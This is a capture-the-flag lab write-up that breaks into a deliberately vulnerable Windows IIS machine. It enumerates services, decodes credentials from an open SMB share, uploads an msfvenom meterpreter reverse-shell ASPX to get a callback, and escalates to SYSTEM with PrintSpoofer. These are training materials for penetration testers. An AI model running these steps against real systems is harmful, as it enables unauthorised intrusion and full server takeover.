From aldeid
Jump to navigation Jump to search

Penetration Testing Challenge

You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days.

Scope of Work

The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you secure two flags (no location provided) as proof of exploitation:

  • User.txt
  • Root.txt

Additionally, the client has provided the following scope allowances:

  • Any tools or techniques are permitted in this engagement, however we ask that you attempt manual exploitation first
  • Locate and note all vulnerabilities found
  • Submit the flags discovered to the dashboard
  • Only the IP address assigned to your machine is in scope
  • Find and report ALL vulnerabilities (yes, there is more than one path to root)

(Roleplay off)

I encourage you to approach this challenge as an actual penetration test. Consider writing a report, to include an executive summary, vulnerability and exploitation assessment, and remediation suggestions, as this will benefit you in preparation for the eLearnSecurity Certified Professional Penetration Tester or career as a penetration tester in the field.

Note - Nothing in this room requires Metasploit

Machine may take up to 5 minutes for all services to start.

Please do not stream this room for the first 7 days of it’s release (August 21, 2020).

User flag


Let’s start to enumerate the services with Nmap. There are several web services (80/tcp, 49663/tcp), as well as a network share (445/tcp).

80/tcp    open  http          Microsoft IIS httpd 10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
49663/tcp open  http          Microsoft IIS httpd 10.0
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Network share

Let’s start with the network share. Listing the shares reveals the presence of nt4wrksv.

$ smbclient -L //
Enter WORKGROUP\kali's password: 

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    nt4wrksv        Disk      
SMB1 disabled -- no workgroup available

Connecting to this share reveals a password file:

$ smbclient //
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 25 23:46:04 2020
  ..                                  D        0  Sat Jul 25 23:46:04 2020
  passwords.txt                       A       98  Sat Jul 25 17:15:33 2020

        7735807 blocks of size 4096. 4951539 blocks available
smb: \> get passwords.txt 
getting file \passwords.txt of size 98 as passwords.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit

This file contains base64 encoded credentials:

$ cat passwords.txt 
[User Passwords - Encoded]
kali@kali:/data/Relevant/files$ echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d
Bob - !P@$$W0rD!123
kali@kali:/data/Relevant/files$ echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d
Bill - Juw4nnaM4n420696969!$$$

However, we won’t need this for the exploitation of the machine, as we will see later.


Scanning the hidden web directories on both ports 80/tcp and 49663/tcp takes a while but is worth it (with directory-list-2.3-medium.txt). Nothing interesting stands out on port 80/tcp, but we find that the nt4wrksv share found previously is also available as a hidden location on port 49663/tcp.

Upload reverse shell

Interestingly, the network share is writable, which means we can upload arbitrary files. Let’s first generate a reverse shell with msfvenom:

$ msfvenom -p windows/x64/meterpreter_reverse_tcp lhost= lport=4444 -f aspx -o shell.aspx

Now, let’s connect to the network share and upload our reverse shell aspx file:

smb: \> put shell.aspx 
putting file shell.aspx as \shell.aspx (12.9 kb/s) (average 7.9 kb/s)
smb: \> ls
  .                                   D        0  Thu Aug 27 22:48:34 2020
  ..                                  D        0  Thu Aug 27 22:48:34 2020
  passwords.txt                       A       98  Sat Jul 25 17:15:33 2020
  shell.aspx                          A    38409  Thu Aug 27 22:48:37 2020
  test.txt                            A        5  Thu Aug 27 22:42:10 2020

        7735807 blocks of size 4096. 4946700 blocks available
smb: \> 

Start a listener in Metasploit

kali@kali:/data/vpn$ msfconsole -q
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > set lhost
lhost =>
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 

And call the reverse shell in the browser or with curl:

$ curl

We now have a meterpreter session:

[*] Meterpreter session 1 opened ( -> at 2020-08-28 08:57:33 +0200

meterpreter > getuid 
Server username: IIS APPPOOL\DefaultAppPool

User flag

From here, we eventually get the user flag:

meterpreter > cat c:/users/bob/desktop/user.txt

Root flag

List privileges

Checking our privileges with getpriv in our meterpreter session reveals that we are granted with SeImpersonatePrivilege.

meterpreter > getprivs

Enabled Process Privileges



To exploit this impersonation privilege, the standard potato exploit won’t work, and we’ll use a new tool called PrintSpoofer.

Download, Compile (in Microsoft Visual Studio) and upload PrintSpoofer.exe to the target.

c:\>cd \inetpub\wwwroot\nt4wrksv
cd \inetpub\wwwroot\nt4wrksv

 Volume in drive C has no label.
 Volume Serial Number is AC3C-5CB5

 Directory of c:\inetpub\wwwroot\nt4wrksv

08/28/2020  11:54 PM    <DIR>          .
08/28/2020  11:54 PM    <DIR>          ..
07/25/2020  08:15 AM                98 passwords.txt
08/28/2020  11:47 PM            27,136 PrintSpoofer.exe
08/28/2020  11:54 PM         1,015,587 shell.aspx
               3 File(s)      1,042,821 bytes
               2 Dir(s)  20,256,440,320 bytes free

Elevate privileges (PrintSpoofer)

Now, let’s elevate our privileges with printspoofer:

c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer.exe -i -c powershell.exe
PrintSpoofer.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
nt authority\system

Root flag

We eventually read the root flag:

PS C:\Windows\system32> cd \users\administrator\desktop
cd \users\administrator\desktop
PS C:\users\administrator\desktop> dir

    Directory: C:\users\administrator\desktop

Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a----        7/25/2020   8:25 AM             35 root.txt                      

PS C:\users\administrator\desktop> cat root.txt
cat root.txt
PS C:\users\administrator\desktop>